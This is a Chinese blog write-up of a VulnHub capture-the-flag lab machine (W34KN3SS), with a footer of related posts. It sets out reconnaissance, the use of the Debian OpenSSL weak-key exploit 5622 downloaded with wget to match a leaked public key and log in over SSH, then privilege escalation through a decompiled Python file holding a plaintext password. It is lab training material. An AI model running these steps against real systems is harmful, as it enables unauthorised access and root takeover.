W34KN3SS靶机复现

于 2024-08-12 00:23:23 发布
阅读量222 收藏 5
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/141114695
版权

靶机设置

设置为nat网卡模式,查看mac地址

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.131

目录扫描

因为80端口开放,进行目录扫描

访问浏览器

目录拼接

拼接/upload.php

发现一个文件上传页面

试图上传一个木马,发现不行

拼接/test/

发现需要很多密钥,在host文件中绑定

hosts文件中 绑定ip和weakness.jth

访问weakness.jth

目录扫描

在kali中也绑定host,方便后续使用

dirb "http://weakness.jth"

目录拼接

拼接/private

发现两个文件

打开mykey.pub

发现是加密的ssh公钥,尝试解密失败

打开note.txt

发现openssl的版本

msf寻找漏洞

因为知道了openssl的版本,去msf中寻找对应的exp

发现5622.txt适合,下载下来

查看

cat 5622.txt

把这个地址的私钥下载下来

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

tar -jxvf 5622.tar.bz2解压下来

将公钥下载下来

wget http://weakness.jth/private/files/mykey.pub

getshell

对比公钥和私钥

cat mykey.pub

grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw=="

尝试ssh连接

ssh -i rsa/2048/4161de56829de2fe64b9055711f531c1-2537 n30@192.168.112.131

getshell成功

提权

sudo -l发现需要输入密码

ls查看文件发现有一个user.txt

cat user.txt查看内容

25e3cd678875b601425c9356c8039f68

检查文件代码时,发现了一个python的编译文件,进行下载查看

file code

cp code /var/www/html

python3 -m http.server开启远程下载

wget http://192.168.112.131/code

mv code code.pyc该名为反编译文件

进行反编译

uncompyle6 code.pyc code.py

Username:n30

Password:dMASDNB!!#B!#!#33

再次查看发现有任何权限

直接sudo su

提权成功

CcHKer
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机系列--W34KN3SS
Nginxx的博客
12-02 1336
靶机系列
W34KN3SS靶机
weixin_74232792的博客
08-05 610
python2 5720.py ./rsa/2048 192.168.101.93 n30 22 其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。notes.txt有提示,openssl的版本,mykey有一个公钥。放到kali上解压,解压完会生成一个rsa文件夹。kali也绑定该域名,再次目录扫描,发现新东西。端口目录扫描,有一个域名。
W34KN3SS靶机渗透测试
最新发布
weixin_58786230的博客
08-11 87
【代码】W34KN3SS靶机渗透测试。
vulnhub W34kn3ss: 1
箭雨镜屋
07-31 681
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- 修改hosts文件,并扫描网站目录 ---- 利用OpenSSL 0.9.8c-1可预测伪随机数漏洞爆破ssh私钥 ---- uncompyle6反编译.pyc ---- sudo su提权
Vulnhub靶机 W34KN3SS
菜浪马废的博客
04-29 354
应该没配置域名
W34kn3ss 1靶机
hqy250019的博客
08-11 80
当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。
W34KN3SS靶场复现【附代码】(权限提升)
weixin_52487093的博客
08-10 620
W34KN3SS靶场复现【附代码】(权限提升) #python 2.7 byte-compiled文件反编译 #uncompyle6的使用
【vulnhub】W34kn3ss 1靶机
wbplife的博客
08-08 357
当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。
W34KN3SS
weixin_52953960的博客
08-07 211
其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。修改hosts文件,绑定域名weakness.jth,然后访问该域名,发现 -n30,和upload.php页面的title一样。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。在notes.txt中有提示,给出openssl的版本,mykey有一个公钥。kali绑定该域名,再次进行目录扫描,发现新东西。在kali上搜索相关漏洞。
靶机W34KN3SS练习报告1
08-08
"靶机W34KN3SS练习报告1"提供了一个详细的过程,展示了如何逐步攻破一个虚拟靶机,并最终获取root权限。以下是这个过程中的关键知识点: 1. **虚拟机导入与启动**:靶机是以.ova格式提供的,可以使用VirtualBox或...
SICK W34紧凑型光电开关 选型册.rar
10-13
3. 电气参数:根据设备电源和控制系统的需求,选择匹配的工作电压和电流消耗。 4. 输出形式:根据控制系统的逻辑和信号处理方式,选择NPN或PNP输出,以及常开或常闭状态。 四、应用实例 SICK W34系列紧凑型光电...
W34紧凑型光电传感器选型手册(中文版).zip
09-13
《W34紧凑型光电传感器选型手册》是为工程师们提供的一款详尽的参考资料,旨在帮助用户在设计和实施工业自动化项目时选择合适的光电传感器。这款传感器因其紧凑的尺寸和高效性能而在众多领域得到广泛应用,包括物流...
dianying 2w34t54y754
06-17
6t6tehbtrhu5drhbrshbrthrthbjherhtjnhe6uyh5
光感模块stk3x1x内核代码以及datasheet
07-18
`STK3311-W24-W34-W38 Datasheet v1.0(1).pdf`是stk3x1x的官方数据手册,包含了详细的硬件特性、电气规格、引脚定义、操作模式和通信协议。例如, datasheet中会提供传感器的灵敏度范围、测量精度、电源电压要求以及...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8376
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
005 - 马科维茨投资组合理论实现
08-10
python基于tushare实现马科维茨投资组合理论实现
基于ASP的学生信息档案管理系统毕业论文及源码.rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT).zip
08-10
[毕业设计]VB与Access共筑文档安全管理与分享平台(源代码+论文+答辩PPT)
R语言代码编写 提取大写字母后的数字 df<-tibble(x=c("12W34", "AB2C46", "B217C","akTs6df","21WD4"))
06-07
df (x = c("12W34", "AB2C46", "B217C", "akTs6df", "21WD4")) df$number ("^.*[A-Z](\\d+).*", "\\1", df$x) ``` 解释一下代码: 1. 首先,我们使用了 `gsub` 函数,它可以帮助我们在一个字符串中查找和替换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值